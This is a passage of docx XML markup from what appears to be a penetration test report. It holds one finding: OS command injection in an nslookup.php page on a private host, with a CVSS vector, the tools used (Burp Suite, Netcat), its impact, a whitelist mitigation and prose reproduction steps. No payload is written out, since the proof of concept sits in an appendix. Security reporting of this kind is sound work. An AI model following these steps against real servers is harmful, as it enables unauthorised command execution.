          </w:tcPr>
          <w:p w14:paraId="69DE1293" w14:textId="277DFEEA" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00E3258C" w:rsidP="00DA48D8">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AC:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PR:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UI:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/S:C/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="077B8672" w14:textId="7067C266" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="60AE7D6A" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="271"/>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6B02ACDD" w14:textId="77777777"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B571C1" w:rsidRPr="00D77DFE" w14:paraId="38878450" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="210E3156" w14:textId="2B19C4A9" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1"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Browser, </w:t>
            </w:r>
            <w:r w:rsidR="00E3258C" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite, </w:t>
            </w:r>
            <w:r w:rsidR="00C02F3D" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">etcat </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="0CAE9EC9" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="259"/>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41EBC342" w14:textId="77777777" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1"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B571C1" w:rsidRPr="00D77DFE" w14:paraId="1649B56F" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="220E3666" w14:textId="317ACAF7" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00640EA0" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command Injection allows attackers to run system commands on the server, leading to full compromise of the application and its data. It can also enable further exploitation of the hosting environment and facilitate lateral movement to other internal systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="695316FA" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="271"/>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24D3B853" w14:textId="77777777" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1"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B571C1" w:rsidRPr="00D77DFE" w14:paraId="6845F560" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="295"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33A551F5" w14:textId="1C25060C" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://10.0.3.190:80/nslookup.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00E3258C" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="504495D2"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5EE347C1" w14:textId="77777777"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B571C1" w:rsidRPr="00D77DFE" w14:paraId="3FA52798" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="277"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65FD40A0" w14:textId="13EB8D97" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="006A5C44" w:rsidP="006A5C44">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>This vulnerability enables arbitrary command execution, potential escalation to system‑level privileges, and lateral movement that allows attackers to pivot deeper into the internal network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="4287F429"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3DECDA85" w14:textId="77777777"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B571C1" w:rsidRPr="00D77DFE" w14:paraId="56512869"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tcPr>
          <w:p w14:paraId="7839A3E3" w14:textId="14C26550" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="006A5C44" w:rsidP="006A5C44">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>To mitigate command injection, validate input using a strict whitelist, ensure values are numeric when required, and allow only alphanumeric characters with no additional syntax or whitespace.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="287D4D57"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64A4FCA6" w14:textId="488995CA" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C1" w:rsidP="00C420B0">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B571C1" w:rsidRPr="00D77DFE" w14:paraId="3CE3820D"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tcPr>
          <w:p w14:paraId="4FFD20E3" w14:textId="31604402" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access nslookup.php, inject shell metacharacters into the domain parameter, observe that the input is passed directly to a system command, confirm execution of the injected payload through outbound activity, and verify that commands run under the www‑data context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="0AA7011A"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779E3011" w14:textId="52894A5E" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00433721" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="6D70C062" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="552E549C" w14:textId="55F561D3" w:rsidR="00433721" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="00D44224">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept evidence is provided in Appendix A</w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA41" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>, Figure A.</w:t>
              </w:r>
              <w:r w:rsidR="00145D28" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>4</w:t>
              </w:r>
              <w:r w:rsidR="00D44224" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>.1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D44224" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA42" w:history="1">
              <w:r w:rsidR="00D44224" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure </w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>A.</w:t>
              </w:r>
              <w:r w:rsidR="00145D28" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>4</w:t>
              </w:r>
              <w:r w:rsidR="00D44224" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>.2.</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w14:paraId="3B9416FA" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="286"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="0288222F" w14:textId="77777777" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00B571C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B571C1" w:rsidRPr="00D77DFE" w14:paraId="49A6C265" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="408"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9574" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79A853E0" w14:textId="39F9677F" w:rsidR="00B571C1" w:rsidRPr="00D77DFE" w:rsidRDefault="00D44224" w:rsidP="00D44224">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId35" w:anchor="ways-of-injecting-os-commands" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://portswigger.net/web-security/os-command-injection#ways-of-injecting-os-commands</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41BC2319" w14:textId="77777777" w:rsidR="00337165" w:rsidRPr="00D77DFE" w:rsidRDefault="00337165" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15249834" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
